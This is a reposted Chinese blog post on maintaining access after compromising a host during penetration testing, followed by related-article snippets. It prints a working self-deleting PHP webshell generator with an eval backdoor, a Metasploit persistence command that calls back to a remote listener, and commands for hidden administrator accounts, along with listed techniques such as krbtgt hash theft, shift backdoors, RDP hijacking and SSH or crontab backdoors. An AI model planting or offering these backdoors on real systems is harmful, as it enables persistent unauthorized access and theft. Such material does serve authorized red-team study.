渗透测试之权限维持

最新推荐文章于 2024-05-06 13:17:02 发布
最新推荐文章于 2024-05-06 13:17:02 发布
阅读量1k 收藏 5
点赞数
分类专栏: 渗透测试-权限维持
原文链接:https://blog.csdn.net/qq_36119192/article/details/84674109
版权

权限维持


在拿到目标主机的权限后,很有可能当时我们并不能获取到想要的东西,需要进行长期的潜伏,特别是在内网渗透中,需要进行长期的信息收集。这时,权限维持就很重要了。我们需要维持住获得的现有权限。

Web后门

1:隐藏后门文件(将文件设置为隐藏)

2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话免杀木马。结合attrib命令隐藏文件更好地建立后门。

<?php
    set_time_limit(0);//程序执行时间
    ignore_user_abort(1);//关掉终端后脚本仍然运行
    unlink(__FILE__);//文件完整名
    while(1){
        file_put_contents('test.php','<?php $a=array($_REQUEST["x"]=>"3");
        $b=array_keys($a)[0];
        eval($b);?>');
        sleep(5);
    }
?>


3: 404页面隐藏后门,或者在其他自带文件中插入后门代码

:以上几种后门方法均能被D盾等工具检测到

Windows系统

1:建立隐藏用户,在用户名后加 $ 

2:在开机启动目录下放置木马文件,只要目标机器重启,将回连我们的远控

3:MSF里的 persistence 模块,执行命令可以使目标机器每隔一定时间自动回连远控。但是容易被发现

#反弹时间间隔是5s 会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀
run persistence -X -i 5 -p 8888 -r 192.168.10.27  
 
#然后它就在目标机新建了这个文件:C:\Windows\TEMP\CJzhFlNOWa.vbs ,并把该服务加入了注册表中,只要开机就会启动


4:在域环境下,想办法获得 krbtgt 用户的哈希,该用户的哈希可以进行票据传递攻击。而且一般该用户的密码不经常改变。

5:shift后门

6:远程桌面会话劫持 

Linux系统

1:SSH后门

2:crontab定时任务

3:SSH公钥

4:创建SUID=0的用户
————————————————
版权声明:本文为CSDN博主「谢公子」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_36119192/article/details/84674109

清尘大哥
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透中的权限维持
anquanzushiye的博客
04-13 2792
当今时代,每时每刻都发生着新的重大数据泄露事件,对于个人Internet用户、公司和政府而言,重要的是要时刻意识到可能影响其系统的漏洞。SECSHI.COM提供了全方位的信息和工具,以...
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
2024年最新Windows权限维持技术总结、复现_cs权限维持,网络安全开发技术总结
最新发布
2401_84264692的博客
05-06 859
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
渗透测试入门7之权限维持
鹿鸣天涯
04-03 1269
渗透测试入门7之权限维持 系统后门 Windows 1、密码记录工具 WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。 键盘记录器...
渗透测试框架权限维持
duan_qiao925的博客
06-19 359
Metasploit权限维持 简单介绍下Metasploit,这是一个渗透测试平台,可以查找、利用、验证漏洞。与Metasploit的大部分交互式通过模块完成的,例如可以通过“auxiliary”模块进行信息收集,使用"exploit"模块进行漏洞利用,利用"payload"模块链接到shell。 生成木马 命令解释 -l, --list <type> 列出指定类型的所有模块 类型包括: payloads, encoders, nops, pla
web渗透--权限维持
朝阳似锦 晖映山河
09-29 165
远程控制生成与上传 metasploit msfcosle search ms17-010 use exploit/windows/smb/ms170_010_eternablue show options 设置rhosts show payloads set payload windows/x64/meterpreter/reverse_tcp 设置反弹shell show options set lhost kali-IP exploit/run 远程控制 使用njRAT
渗透测试的实施流程:明确目标、信息收集、漏洞发现、漏洞验证、后渗透测试
08-19
在这个阶段,渗透测试小组在客户允许的范围内进行内网渗透,权限维持权限提升、读取用户hash、浏览器密码等。 6. 痕迹清除 在这个阶段,渗透测试小组清除中间数据,清理掉上传的webshell后门,删除上传、下载的...
权限维持方法浅析.pdf
08-08
前情提要& 本集简介 Golden Ticket Silver Ticket SID History SID History -Golden Ticket Now More GOLDEN! Directory Service Restore Mode (DSRM) DSRM -Pass The Hash&DCSync Malicious Security Support ...
域渗透实战之fuse.pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
应急响应实战笔记——权限维持篇:⑥ 三大渗透测试框架权限维持技术
君逍遥o
04-07 635
渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?
Telemetry:WINDOWS TELEMETRY权限维持
03-18
遥测 背景 是Windows持久性的C# 今天,我们将讨论一种持久性方法,该方法利用了Microsoft过去十年在Windows版本中包含的一些出色的遥测技术。 本地管理员的安装权限(要求具有写入HKLM的能力) 有CompatTelRunner.exe 2008R2 / Windows 7至2019 / Windows 10 优势 使用系统自己的遥测计划任务 仅注册表可疑后门故障排除 命令行用法 ABUSING WINDOWS TELEMETRY FOR PERSISTENCE .Imanfeng Features: Install: - Deployment authority maintains backdoor Command:
后渗透阶段的权限维持
Fly_鹏程万里
08-22 2597
前言 当我们在渗透过程中通过漏洞获取到目标主机权限后,往往会因为服务器管理员发现和修补漏洞而导致对服务器权限的丢失,所以权限维持就显得很重要了。 在windows主机中,我总结了下面几种权限维持的方法,不足之处还望各位大佬斧正。 添加影子账户 影子账户可以理解为和主体一模一样但是又看不见的账户,其隐蔽性较好,只能在注册表里面看到。 首先,我们需要创建一个隐藏账号OMG$ 使用命令 net...
三大渗透框架权限维持
09-28 1031
渗透测试中,有三个非常经典的渗透测试框架--Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用渗透框架获得持久...
内网渗透系列:权限维持方法小结
闵行小鱼塘
08-02 2350
小结下权限维持方法
windows权限维持的方法
小小猪的博客
01-04 5928
windows权限维持的方法 影子账户: 使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用户,但是在计算机管理页面中还是可以看到,需要通过修改注册表来隐藏 打开注册表(HKEY_LOCAL_MACHINE\SAM\SAM),修改SAM权限,赋予adminitrators完全控制权限 重启之后,将Administr.
内网渗透-windows权限维持的方法
lza20001103的博客
04-14 1246
内网渗透-windows权限维持的方法
渗透之权限维持的13种方法
include_voidmain的博客
08-04 1104
渗透之权限维持的13种方法
网络安全之权限维持(持续更新)
qq_52074678的博客
05-22 1882
权限维持 我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制目标。 渗透流程 Windows权限维持 1.用户维持 隐藏用户维持(影子用户) 隐藏账户,顾名思义就是计算机看不到的用户(不是不存在用户只是用一般的查看方式看不到) $符号隐藏用户 $符号隐藏用户就是在一个用户名后面加$符号,如(hack$)达到简单的隐藏用户目的,从而进行简单的权限维持 1.我们平时查看一个操作系统的几个用户的命令如下 net user.
渗透测试中的权限维持技术
权限维持中,攻击者需要注意权限维持的重要性,包括渗透测试、获取信息、权限维持等步骤。渗透测试是指攻击者需要测试目标系统的漏洞,以便可以攻破目标系统。获取信息是指攻击者需要获取目标系统的敏感信息。权限...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值